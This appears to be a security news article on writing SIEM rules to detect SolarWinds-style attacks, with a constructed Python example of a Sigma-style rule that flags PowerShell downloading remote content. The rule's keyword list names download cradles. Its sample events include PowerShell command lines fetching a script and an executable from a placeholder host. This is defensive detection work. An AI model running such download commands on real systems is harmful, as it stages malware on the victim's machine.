
Detecting the "Next" SolarWinds-Style Cyber Attack
2021-04-13 10:21

Developing SIEM rules, using the SolarWinds attack as an example.

For the SolarWinds Sunburst attack, as for many other attacks, Cymulate's Sigma rules are queries that search for the attack's indicators of behavior (IOBs).

Let's look at the specific case of a recreated SolarWinds attack on the Windows platform and hunt it together.

The next event in the attack is downloading content with PowerShell.

If you have built this SIEM or EDR rule from the Cymulate-provided Sigma rules and you see an alert from it, there is a good chance you are experiencing the SolarWinds attack right now.
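To make the "PowerShell downloads content" detection concrete, here is an added example that is not the article's code and not Cymulate's actual Sigma rule. It expresses a constructed Sigma-style rule as a Python dict (a real Sigma rule uses the same keys in YAML), implements the small subset of the Sigma condition language the rule needs, and runs it over constructed Sysmon-style process-creation events. The field names `Image`, `CommandLine` and `ParentImage` are the standard Sigma process_creation fields; the command-line strings, the `example.invalid` hostnames and the `ccmexec.exe` parent-process filter are assumptions made for the illustration, not telemetry from any real incident.

```python
"""Minimal Sigma-style matcher for the 'PowerShell downloads content' behaviour.

Added illustration, not Cymulate's rule and not code from the original article.
The rule, the filter and the process-creation events below are constructed.
"""

# Constructed Sigma-like rule as a Python dict. A real Sigma rule is YAML with
# the same keys; the fields follow the Sigma process_creation log source.
POWERSHELL_DOWNLOAD_RULE = {
    "title": "PowerShell downloading remote content (constructed example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
        },
        # Behaviour, not a hash: any of these substrings marks a download cradle.
        "selection_cmd": {
            "CommandLine|contains": [
                "Net.WebClient",
                "DownloadString",
                "DownloadFile",
                "Invoke-WebRequest",
                "Start-BitsTransfer",
            ],
        },
        # Hypothetical allow-list: a management agent that legitimately fetches
        # scripts. Tune this to your own environment.
        "filter_mgmt_agent": {
            "ParentImage|endswith": ["\\ccmexec.exe"],
        },
        "condition": "selection_img and selection_cmd and not filter_mgmt_agent",
    },
    "level": "high",
}


def _field_matches(event, key, values):
    """Evaluate one 'Field|modifier': [values] clause (OR across the values)."""
    field_name, _, modifier = key.partition("|")
    lowered = str(event.get(field_name, "")).lower()
    for value in values:
        value = value.lower()
        if modifier == "contains" and value in lowered:
            return True
        if modifier == "endswith" and lowered.endswith(value):
            return True
        if modifier == "" and lowered == value:
            return True
    return False


def _selection_matches(event, selection):
    """Every clause inside one selection must hold (AND across fields)."""
    return all(_field_matches(event, k, v) for k, v in selection.items())


def rule_matches(rule, event):
    """Evaluate conditions of the form 'a and b and not c' (a Sigma subset)."""
    detection = rule["detection"]
    result = True
    for term in detection["condition"].split(" and "):
        negate = term.startswith("not ")
        name = term[4:] if negate else term
        hit = _selection_matches(event, detection[name])
        result = result and (not hit if negate else hit)
    return result


def hunt(rule, events):
    """Return the EventIds, in order, of the events that trigger the rule."""
    return [e["EventId"] for e in events if rule_matches(rule, e)]


# Constructed process-creation events (Sysmon-style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"EventId": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage2.ps1')\""},
    {"EventId": 2,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"EventId": 3,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c curl http://example.invalid/x"},
    {"EventId": 4,  # matches the cradle pattern but is excluded by the filter
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "ParentImage": "C:\\Windows\\CCM\\ccmexec.exe",
     "CommandLine": "pwsh.exe -File C:\\scripts\\inventory.ps1 "
                    "Invoke-WebRequest https://intranet.example.invalid/list"},
    {"EventId": 5,
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "pwsh.exe -c \"Invoke-WebRequest -Uri http://example.invalid/u.exe "
                    "-OutFile C:\\Users\\Public\\u.exe\""},
]

if __name__ == "__main__":
    for event_id in hunt(POWERSHELL_DOWNLOAD_RULE, SAMPLE_EVENTS):
        print("ALERT: PowerShell download behaviour in event", event_id)
```

Run as a script it alerts on events 1 and 5 only: event 2 runs PowerShell without fetching anything, event 3 is not PowerShell, and event 4 is suppressed by the allow-list filter. The point of keying on the command-line behaviour rather than on a file hash is the IOB idea from the article: a rebuilt or re-signed stage-two loader still has to download its content somehow, so the behavioural rule survives changes to the payload.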

The steps shown in this article are meant to help optimize your detections and guide you through preventing a SolarWinds-type attack.


News URL

http://feedproxy.google.com/~r/TheHackersNews/~3/E54HufS4xFI/detecting-next-solarwinds-attack.html